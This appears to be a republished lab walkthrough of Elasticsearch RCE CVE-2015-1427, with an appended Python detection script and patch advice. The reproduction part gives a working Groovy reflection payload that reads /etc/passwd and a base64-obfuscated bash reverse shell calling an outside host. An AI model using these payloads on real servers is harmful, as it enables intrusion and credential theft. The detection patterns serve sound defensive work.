2025-09-19 Update From: SLTechnology News&Howtos (shulou), Network Security
Shulou (Shulou.com) 05/31 Report
This article is about how to reproduce the ElasticSearch Groovy remote code execution vulnerability CVE-2015-1427. The editor thinks it is very practical, so I share it with you. I hope you can get something after reading this article. Let's take a look at it.
Elasticsearch is a Lucene-based search server. It provides a distributed, multi-user full-text search engine behind a RESTful web interface. Written in Java and released as open source under the Apache license, Elasticsearch is a popular enterprise search engine.
In 2014 a remote code execution vulnerability (CVE-2014-3120) was disclosed: the MVEL script engine used by Elasticsearch evaluated script code supplied in queries as expressions, allowing attackers to execute arbitrary Java code through MVEL constructs.
The scripting engine was later replaced by Groovy and a sandbox was added so that dangerous code would be intercepted. This time, the sandbox's lax restrictions (it can be escaped through reflection, as the payload below shows) again led to remote code execution.
Affected versions: Elasticsearch 1.3.0-1.3.7 | 1.4.0-1.4.2
This article only records the reproduction of the vulnerability; the exploitation process is as follows:
I. Building the vulnerable environment
The vulnerable environment in this article is built with vulhub. Execute the following commands to start it:
cd /elasticsearch/CVE-2015-1427
docker-compose build
docker-compose up -d
After startup, access port 9200; the response is shown below:
Vulnerability link: http://192.168.101.152:9200/
II. Reproducing the vulnerability
To exploit this vulnerability, at least one document must exist in Elasticsearch, so first send the following packet to add data:
POST /website/blog/ HTTP/1.1
Host: 192.168.101.152:9200
Content-Length: 21

{"name": "test"}
A 201 response indicates the document was added successfully. Then send the following packet to execute a command:
POST /_search?pretty HTTP/1.1
Host: 192.168.101.152:9200
Content-Length: 410

{"size": 1, "script_fields": {"test#": {"script": "java.lang.Math.class.forName(\"java.io.BufferedReader\").getConstructor(java.io.Reader.class).newInstance(java.lang.Math.class.forName(\"java.io.InputStreamReader\").getConstructor(java.io.InputStream.class).newInstance(java.lang.Math.class.forName(\"java.lang.Runtime\").getRuntime().exec(\"cat /etc/passwd\").getInputStream())).readLines()", "lang": "groovy"}}}
The command is executed successfully and its output is returned in the response.
To make things easier, a reverse shell can be sent back to the attacker's server.
On that server, run nc -lvvp with the listening port.
Then execute the following command through the same payload to send back the shell:
bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xLjEuMS4xLzg4NDEgMD4mMQ==}|{base64,-d}|{bash,-i}
The reverse shell is received successfully.
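As an added defender-side example (not part of the original article or of vulhub), the following Python script does two things a responder would want after reading the above: it checks a node's version banner (the JSON returned by GET / on port 9200) against the affected ranges stated above, and it scans _search request bodies for Groovy script_fields that use the reflection chain seen in the payload (Class.forName, Runtime, exec). The banner, the sample bodies and the pattern list are constructed for this example, and the function names are my own, not an Elasticsearch API.

```python
import json
import re

# Affected ranges as stated in the article: 1.3.0-1.3.7 and 1.4.0-1.4.2.
AFFECTED_RANGES = (
    ((1, 3, 0), (1, 3, 7)),
    ((1, 4, 0), (1, 4, 2)),
)

# Tokens the Groovy sandbox was supposed to keep out of scripts but which the
# reflection chain in the payload above still reaches. Constructed list.
REFLECTION_PATTERNS = (
    r"\.class\.forName\s*\(",
    r"java\.lang\.Runtime",
    r"getRuntime\s*\(",
    r"ProcessBuilder",
    r"\.exec\s*\(",
)


def parse_version(number):
    """'1.4.2' -> (1, 4, 2); drops pre-release suffixes such as '-beta1'."""
    core = number.split("-")[0]
    return tuple(int(p) for p in core.split(".")[:3])


def is_affected(number):
    """True when the version string lies inside one of the affected ranges."""
    v = parse_version(number)
    return any(lo <= v <= hi for lo, hi in AFFECTED_RANGES)


def banner_is_affected(banner_text):
    """Check the JSON returned by GET / on port 9200 (version.number field)."""
    banner = json.loads(banner_text)
    return is_affected(banner["version"]["number"])


def _iter_scripts(node):
    """Yield (script, lang) for every inline script object in a request body."""
    if isinstance(node, dict):
        if isinstance(node.get("script"), str):
            # In Elasticsearch 1.x, groovy is the default when lang is omitted.
            yield node["script"], node.get("lang", "groovy")
        for value in node.values():
            yield from _iter_scripts(value)
    elif isinstance(node, list):
        for value in node:
            yield from _iter_scripts(value)


def inspect_search_body(body_text):
    """Return one finding per Groovy script that matches a reflection pattern."""
    try:
        body = json.loads(body_text)
    except json.JSONDecodeError:
        return []  # not JSON; nothing to inspect
    findings = []
    for script, lang in _iter_scripts(body):
        hits = [p for p in REFLECTION_PATTERNS if re.search(p, script)]
        if lang == "groovy" and hits:
            findings.append({"lang": lang, "patterns": hits, "script": script})
    return findings


# Constructed samples: a banner from a vulnerable node, a harmless script_fields
# query, and a body using the same reflection chain as the payload above.
SAMPLE_BANNER = '{"status": 200, "name": "node-1", "version": {"number": "1.4.2"}}'
BENIGN_BODY = json.dumps({
    "size": 1,
    "script_fields": {"double_price": {"script": "doc['price'].value * 2",
                                       "lang": "groovy"}},
})
SUSPICIOUS_BODY = json.dumps({
    "size": 1,
    "script_fields": {"test#": {
        "script": 'java.lang.Math.class.forName("java.lang.Runtime")'
                  '.getRuntime().exec("cat /etc/passwd").getInputStream()',
        "lang": "groovy"}},
})

if __name__ == "__main__":
    print("banner affected:", banner_is_affected(SAMPLE_BANNER))
    print("benign findings:", inspect_search_body(BENIGN_BODY))
    for f in inspect_search_body(SUSPICIOUS_BODY):
        print("ALERT groovy script matched", f["patterns"])
```

The version check is the quick triage step; the body inspection is the kind of rule one would run over reverse-proxy or access logs in front of port 9200, since a legitimate script_fields query has no reason to call Class.forName or Runtime. For the fix itself, Elastic's advisory for this CVE recommended setting script.groovy.sandbox.enabled: false in elasticsearch.yml and restarting the node, and the patched releases were 1.3.8 and 1.4.3, which is consistent with the affected ranges above.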
The above is how to reproduce the ElasticSearch Groovy remote code execution vulnerability CVE-2015-1427. The editor believes that there are some knowledge points that we may see or use in our daily work. I hope you can learn more from this article. For more details, please follow the industry information channel.
© 2024 shulou.com SLNews company. All rights reserved.